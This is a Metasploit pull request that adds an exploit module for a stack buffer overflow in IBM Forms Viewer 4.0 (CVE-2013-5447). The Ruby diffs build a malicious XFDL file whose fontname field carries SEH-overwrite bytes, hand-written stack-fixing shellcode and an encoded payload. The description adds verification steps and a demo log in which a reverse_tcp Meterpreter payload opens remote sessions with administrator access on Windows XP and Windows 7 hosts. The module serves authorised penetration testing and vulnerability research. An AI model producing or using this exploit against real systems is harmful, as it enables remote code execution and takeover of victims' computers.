### PR TITLE
Add module for ZDI-13-274

### DIFF
--- a/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb
+++ b/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb
@@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
           ]
         ],
       'Privileged'     => false,
-      'DisclosureDate' => 'Apr 03 2008',
+      'DisclosureDate' => 'Dec 05 2013',
       'DefaultTarget'  => 0))
 
     register_options(
@@ -151,7 +151,6 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("Creating '#{datastore['FILENAME']}' file ...")
 
     file_create(xfdl)
-
   end
 
 end

--- a/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb
+++ b/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb
@@ -4,10 +4,12 @@
 ##
 
 require 'msf/core'
+require 'rexml/document'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
+  include REXML
   include Msf::Exploit::FILEFORMAT
 
   def initialize(info = {})
@@ -72,46 +74,78 @@ class Metasploit3 < Msf::Exploit::Remote
       ], self.class)
   end
 
+  def generate_xfdl
+    xml = Document.new
+
+    # XFDL
+    xfdl = xml.add_element("XFDL", {
+      'xmlns:custom'   => "http://www.ibm.com/xmlns/prod/XFDL/Custom",
+      'xmlns:designer' => "http://www.ibm.com/xmlns/prod/workplace/forms/designer/2.6",
+      'xmlns:ev'       => "http://www.w3.org/2001/xml-events",
+      'xmlns:xfdl'     => "http://www.ibm.com/xmlns/prod/XFDL/7.5",
+      'xmlns:xforms'   => "http://www.w3.org/2002/xforms",
+      'xmlns'          => "http://www.ibm.com/xmlns/prod/XFDL/7.5",
+      'xmlns:xsd'      => "http://www.w3.org/2001/XMLSchema",
+      'xmlns:xsi'      => "http://www.w3.org/2001/XMLSchema-instance"
+    })
+
+    # XFDL => globalpage
+    xdfl_global_page = xfdl.add_element("globalpage", {
+      "sid" => "global"
+    })
+    global = xdfl_global_page.add_element("global", {
+      "sid" => "global"
+    })
+    designer_date = global.add_element("designer:date")
+    designer_date.text = "20060615"
+    form_id = global.add_element("formid")
+    form_id.add_element("title")
+    serial_number = form_id.add_element("serialnumber")
+    serial_number.text = "A6D5583E2AD0D54E:-72C430D4:10BD8923059:-8000"
+    version_form = form_id.add_element("version")
+    version_form.text = "1"
+
+    # XFDL => page
+    page = xfdl.add_element("page", {
+      "sid" => "PAGE1"
+    })
+
+    # XFDL => page => global
+    page_global = page.add_element("global", {
+      "sid" => "global"
+    })
+    label_page = page_global.add_element("label")
+    label_page.text = "PAGE1"
+
+    # XFDL => page => label
+    label = page.add_element("label", {
+      "sid" => "title"
+    })
+    item_location = label.add_element("itemlocation")
+    x = item_location.add_element("x")
+    x.text = "20"
+    y = item_location.add_element("y")
+    y.text = "0"
+    value = label.add_element("value", {
+      "compute" => "global.global.custom:formTitle"
+    })
+    value.text = rand_text_alpha(10)
+    font_info = label.add_element("fontinfo")
+    font_name = font_info.add_element("fontname")
+    font_name.text = "MSF_REPLACE"
+    xml.to_s
+  end
+
+
   def exploit
-
-
     sploit = rand_text_alpha(target['Offset'])
     sploit << "\x61\x62"             # nseh # NSEH # popad (61) + nop compatible with unicode (add [edx+0x0],ah # 006200)
     sploit << [target.ret].pack("v") # seh # ppr
     sploit << [target['Nop']].pack("C")
     sploit << payload.encoded
-    sploit << rand_text_alpha(4096) # make it crash
+    sploit << rand_text_alpha(4096)  # make it crash
 
-
-    xfdl = %Q|<?xml version="1.0" encoding="UTF-8"?>
-<XFDL xmlns:custom="http://www.ibm.com/xmlns/prod/XFDL/Custom" xmlns:designer="http://www.ibm.com/xmlns/prod/workplace/forms/designer/2.6" xmlns:ev="http://www.w3.org/2001/xml-events" xmlns:xfdl="http://www.ibm.com/xmlns/prod/XFDL/7.5" xmlns:xforms="http://www.w3.org/2002/xforms" xmlns="http://www.ibm.com/xmlns/prod/XFDL/7.5" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
-   <globalpage sid="global">
-      <global sid="global">
-         <designer:date>20060615</designer:date>
-         <formid>
-            <title></title>
-            <serialnumber>A6D5583E2AD0D54E:-72C430D4:10BD8923059:-8000</serialnumber>
-            <version>1</version>
-         </formid>
-      </global>
-   </globalpage>
-   <page sid="PAGE1">
-      <global sid="global">
-         <label>PAGE1</label>
-      </global>
-       <label sid="TITLE">
-         <itemlocation>
-            <x>20</x>
-            <y>0</y>
-         </itemlocation>
-         <value compute="global.global.custom:formTitle">Metasploit</value>
-         <fontinfo>
-            <fontname>#{sploit}</fontname>
-         </fontinfo>
-      </label>
-   </page>
-</XFDL>
-|
+    xfdl = generate_xfdl.gsub(/MSF_REPLACE/, sploit) # To avoid rexml html encoding
 
     print_status("Creating '#{datastore['FILENAME']}' file ...")
 

--- a/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb
+++ b/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb
@@ -57,6 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Targets'        =>
         [
           [ 'IBM Forms Viewer 4.0 / Windows XP SP3 / Windows 7 SP1',
+            # masqform.exe 8.0.0.266
             {
               'Ret'    => 0x4c30, # p/p/r unicode from masqform.exe
               'Nop'    => 0x47, # 004700 => add [edi+0x0],al

--- a/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb
+++ b/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb
@@ -1,0 +1,122 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'IBM Forms Viewer Unicode Buffer Overflow',
+      'Description'    => %q{
+        This module exploits a stack-based buffer overflow in IBM Forms Viewer. The vulnerability
+        is due to a dangerous usage of strcpy-like function, and occurs while parsing malformed
+        XFDL files, with a long fontname value. This module has been tested successfully on IBM
+        Forms Viewer 4.0 on Windows XP SP3 and Windows 7 SP1.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'rgod <rgod[at]autistici.org>', # Vulnerability discovery
+          'juan vazquez', # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2013-5447' ],
+          [ 'OSVDB', '100732' ],
+          [ 'ZDI', '13-274' ],
+          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21657500' ],
+        ],
+      'Payload'        =>
+        {
+          'Space'          => 3000,
+          'EncoderType'    => Msf::Encoder::Type::AlphanumUnicodeMixed,
+          'EncoderOptions' =>
+            {
+              'BufferRegister' => 'ECX',
+              'BufferOffset' => 10
+            },
+          'BadChars'       => (0x00..0x08).to_a.pack("C*") + (0x0b..0x1f).to_a.pack("C*") +"\x26\x3c" + (0x80..0xff).to_a.pack("C*"),
+          'DisableNops'    => true,
+          # Fix the stack before the payload is executed, so we avoid
+          # windows exceptions due to alignment
+          'Prepend'        =>
+              "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
+              "\x83\xC0\x08"             + # add eax, byte 8
+              "\x8b\x20"                 + # mov esp, [eax]
+              "\x81\xC4\x30\xF8\xFF\xFF"   # add esp, -2000
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'IBM Forms Viewer 4.0 / Windows XP SP3 / Windows 7 SP1',
+            {
+              'Ret'    => 0x4c30, # p/p/r unicode from masqform.exe
+              'Nop'    => 0x47, # 004700 => add [edi+0x0],al
+              'Offset' => 62
+            }
+          ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Apr 03 2008',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('FILENAME', [ true, 'The file name.',  'msf.xfdl']),
+      ], self.class)
+  end
+
+  def exploit
+
+
+    sploit = rand_text_alpha(target['Offset'])
+    sploit << "\x61\x62"             # nseh # NSEH # popad (61) + nop compatible with unicode (add [edx+0x0],ah # 006200)
+    sploit << [target.ret].pack("v") # seh # ppr
+    sploit << [target['Nop']].pack("C")
+    sploit << payload.encoded
+    sploit << rand_text_alpha(4096) # make it crash
+
+
+    xfdl = %Q|<?xml version="1.0" encoding="UTF-8"?>
+<XFDL xmlns:custom="http://www.ibm.com/xmlns/prod/XFDL/Custom" xmlns:designer="http://www.ibm.com/xmlns/prod/workplace/forms/designer/2.6" xmlns:ev="http://www.w3.org/2001/xml-events" xmlns:xfdl="http://www.ibm.com/xmlns/prod/XFDL/7.5" xmlns:xforms="http://www.w3.org/2002/xforms" xmlns="http://www.ibm.com/xmlns/prod/XFDL/7.5" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
+   <globalpage sid="global">
+      <global sid="global">
+         <designer:date>20060615</designer:date>
+         <formid>
+            <title></title>
+            <serialnumber>A6D5583E2AD0D54E:-72C430D4:10BD8923059:-8000</serialnumber>
+            <version>1</version>
+         </formid>
+      </global>
+   </globalpage>
+   <page sid="PAGE1">
+      <global sid="global">
+         <label>PAGE1</label>
+      </global>
+       <label sid="TITLE">
+         <itemlocation>
+            <x>20</x>
+            <y>0</y>
+         </itemlocation>
+         <value compute="global.global.custom:formTitle">Metasploit</value>
+         <fontinfo>
+            <fontname>#{sploit}</fontname>
+         </fontinfo>
+      </label>
+   </page>
+</XFDL>
+|
+
+    print_status("Creating '#{datastore['FILENAME']}' file ...")
+
+    file_create(xfdl)
+
+  end
+
+end


### PR DESCRIPTION
Tested against IBM Forms Viewer 4.0 on Windows XP SP3 and Windows 7 SP1.

Download IBM Forms Viewer 4.0 from: https://www14.software.ibm.com/webapp/iwm/web/reg/download.do?source=ESD-LOTUSFORMSTRIAL&S_PKG=CRD9QML&S_TACT=109HD0OW&S_CMP=web_dw_rt_swd&lang=en_US&cp=UTF-8

You will ned IBM login
## Verification
- [x] Install Windows XP SP3 or Windows 7 SP1
- [x] Install IBM Forms Viewer 4.0. Verify which the masqform.exe binary version is 8.0.0.266
- [x] Run the module like in the DEMO
- [x] Open the file from the vulnerable environment with IBM Forms Viewer, you should enjoy sessions like in the demo
## Demo

```
msf > use exploit/windows/fileformat/ibm_forms_viewer_fontname 
msf exploit(ibm_forms_viewer_fontname) > show options

Module options (exploit/windows/fileformat/ibm_forms_viewer_fontname):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.xfdl         yes       The file name.


Exploit target:

   Id  Name
   --  ----
   0   IBM Forms Viewer 4.0 / Windows XP SP3 / Windows 7 SP1


msf exploit(ibm_forms_viewer_fontname) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ibm_forms_viewer_fontname) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(ibm_forms_viewer_fontname) > set lport 4444
lport => 4444
msf exploit(ibm_forms_viewer_fontname) > rexploit
[*] Reloading module...

[*] Creating 'msf.xfdl' file ...
[+] msf.xfdl stored at /Users/juan/.msf4/local/msf.xfdl
msf exploit(ibm_forms_viewer_fontname) > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.172.244
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.244:1810) at 2013-12-27 10:57:04 -0600

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.244 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.172.133
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.133:49195) at 2013-12-27 10:57:47 -0600

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.133 - Meterpreter session 2 closed.  Reason: User exit
```
